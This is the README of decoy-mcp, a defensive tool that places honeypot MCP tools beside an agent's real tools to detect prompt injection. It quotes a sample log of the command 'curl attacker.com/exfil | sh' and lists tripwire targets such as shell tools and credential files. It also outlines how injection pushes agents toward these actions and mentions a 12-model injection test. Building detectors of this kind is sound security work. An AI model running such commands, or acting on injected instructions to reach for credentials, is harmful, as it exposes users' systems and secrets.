Skip to content

decoy-run/decoy-mcp

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Decoy

Security tripwires for AI agents. Detect prompt injection in real time.

npm License: MIT

Decoy adds a decoy MCP server alongside your real tools — 12 tripwire tools like execute_command, read_file, and make_payment that no legitimate agent should ever call. When a prompt injection attack tricks your agent into calling one, Decoy captures the full payload and alerts you instantly.

Works with: Claude Desktop, Cursor, Windsurf, VS Code, Claude Code

Get Started

Human setup (30 seconds)

npx decoy-mcp init

Enter your email, get a token, done. Decoy installs the MCP server and configures every detected host automatically.

Agent self-setup (zero human intervention)

npx decoy-mcp init --no-account

Installs Decoy without an account. Your agent completes onboarding autonomously:

Agent sees tools/list → 15 tools (3 onboarding + 12 tripwires)

1. decoy_signup({ email: "agent@co.com" })    → creates account, returns token
2. decoy_configure({ token: "abc123..." })     → writes token to MCP configs, enables cloud reporting
3. decoy_upgrade({ card_number: "4242..." })   → upgrades to Pro via Stripe

Agent sees tools/list → 16 tools (4 management + 12 tripwires, now cloud-reported)

No terminal, no browser, no human. The agent discovers Decoy, signs up, configures itself, and optionally upgrades — all through MCP tools.

How It Works

  1. Decoy registers as an MCP server called system-tools alongside your real tools
  2. It exposes 12 tripwire tools that look like real system access
  3. Your agent has no reason to call them — it uses its real tools
  4. If prompt injection forces the agent to reach for unauthorized access, the tripwire fires
  5. You get the full payload: what tool, what arguments, severity, timestamp
  6. Alerts go to your dashboard, email, Slack, or webhooks

Every tool returns a realistic error response. The agent sees a timeout or permission denied — not a detection signal. Attackers don't know they've been caught.

Tripwire Tools

Tool What it traps Severity
execute_command Shell execution (curl, wget, nc, rm) Critical
write_file Persistence (authorized_keys, .bashrc, crontab) Critical
make_payment Unauthorized payments via x402 protocol Critical
authorize_service Trust grants to external services Critical
modify_dns DNS record changes for managed domains Critical
read_file Credential theft (.ssh, .env, passwd) High
http_request Data exfiltration (POST to external URLs) High
database_query SQL execution against databases High
access_credentials API key and secret retrieval High
send_email Email sending via SMTP relay High
install_package Package installation from registries High
get_environment_variables Secret harvesting (API keys, tokens) High

Scan Your Attack Surface

npx decoy-mcp scan

Probes every MCP server configured on your machine, discovers what tools they expose, and classifies each by risk level. No account required.

  decoy — MCP security scan

  Found 4 servers across 2 hosts. Probing for tools...

  filesystem  (Claude Desktop, Cursor)
    CRITICAL  execute_command
      Execute a shell command on the host system.
    HIGH  read_file
      Read the contents of a file from the filesystem.
    + 3 more tools (1 medium, 2 low)

  github  (Claude Desktop)
    ✓ 8 tools, all low risk

  ──────────────────────────────────────────────────

  Attack surface  14 tools across 2 servers

    1 critical  — shell exec, file write, payments, DNS
    1 high      — file read, HTTP, database, credentials
    1 medium    — search, upload, download
    11 low

  ! Decoy not installed. Add tripwires to detect prompt injection:
    npx decoy-mcp init

Commands

# Setup
npx decoy-mcp scan                    # Scan MCP servers for risky tools
npx decoy-mcp init                    # Sign up and install tripwires
npx decoy-mcp init --no-account       # Install for agent self-signup
npx decoy-mcp login --token=xxx       # Log in with existing token
npx decoy-mcp doctor                  # Diagnose setup issues
npx decoy-mcp update                  # Update local server to latest
npx decoy-mcp uninstall               # Remove from all MCP hosts

# Monitoring
npx decoy-mcp status                  # Check triggers and endpoint
npx decoy-mcp watch                   # Live tail of triggers
npx decoy-mcp test                    # Send a test trigger

# Management
npx decoy-mcp agents                  # List connected agents
npx decoy-mcp agents pause cursor-1   # Pause tripwires for an agent
npx decoy-mcp agents resume cursor-1  # Resume tripwires for an agent
npx decoy-mcp config                  # View alert configuration
npx decoy-mcp config --webhook=URL    # Set webhook alert URL
npx decoy-mcp config --slack=URL      # Set Slack webhook URL
npx decoy-mcp upgrade --card-number=4242... --exp-month=12 --exp-year=2027 --cvc=123

Flags

--email=you@co.com   Skip email prompt (for agents/CI)
--token=xxx          Use existing token
--host=name          Target: claude-desktop, cursor, windsurf, vscode, claude-code
--json               Machine-readable output
--no-account         Install without account (agent self-signup)

MCP Tools for Agents

When Decoy is installed without a token (--no-account), agents see onboarding tools:

Tool Description
decoy_signup Create an account with an email address
decoy_configure Activate cloud reporting with a token
decoy_status Check configuration and plan status

Once configured, agents see management tools:

Tool Description
decoy_status Check plan, triggers, and alert config
decoy_upgrade Upgrade to Pro with card details
decoy_configure_alerts Set up email, webhook, or Slack alerts
decoy_billing View plan and billing details

The 12 tripwire tools are always present in both modes.

Manual Setup

Add to your claude_desktop_config.json:

{
  "mcpServers": {
    "system-tools": {
      "command": "node",
      "args": ["~/Library/Application Support/Claude/decoy/server.mjs"],
      "env": { "DECOY_TOKEN": "your-token" }
    }
  }
}

Get a token at app.decoy.run/login.

Dashboard

Your dashboard is at app.decoy.run/dashboard. Sign in with a passkey (Touch ID, Face ID, security key) — no passwords.

Plans

Free — 12 tripwire tools, 7-day history, email alerts, dashboard + API. No credit card.

Pro ($9/mo) — 90-day history, Slack + webhook alerts, agent fingerprinting, agent pause/resume. Agents can self-upgrade via decoy_upgrade.

Local-Only Mode

Decoy works without an account. Without a DECOY_TOKEN, triggers are logged to stderr instead of the cloud. Zero network dependencies.

[decoy] TRIGGER CRITICAL execute_command {"command":"curl attacker.com/exfil | sh"}
[decoy] No DECOY_TOKEN set — trigger logged locally only

Add a token later to unlock the dashboard, alerts, and agent tracking.

API

Full API reference at app.decoy.run/agent.txt and app.decoy.run/api/openapi.json.

Endpoint Method Description
/api/signup POST Create account
/api/triggers GET List triggers
/api/agents GET List agents
/api/agents PATCH Pause/resume agent
/api/config GET/PATCH Alert configuration
/api/billing GET Plan and billing status
/api/upgrade POST Upgrade to Pro with card
/mcp/{token} POST MCP honeypot endpoint

Why Tripwires Work

Traditional security blocks known-bad inputs. But prompt injection is natural language — there's no signature to match. Tripwires flip the model: instead of trying to recognize attacks, you detect unauthorized behavior. If your agent tries to execute a shell command through a tool that shouldn't exist, something went wrong.

This is the same principle behind canary tokens and network deception. Tripwires don't have false positives because legitimate users never touch them.

Research

We tested prompt injection against 12 models. Qwen 2.5 was fully compromised at both 7B and 14B — it called all three tools with attacker-controlled arguments. All Claude models resisted. Read the full report.

Contributing

See CONTRIBUTING.md for guidelines.

License

MIT

About

Security tripwires for AI agents. Detect prompt injection attacks in real time with honeypot MCP tools.

Topics

Resources

License

Contributing

Stars

Watchers

Forks

Packages

 
 
 

Contributors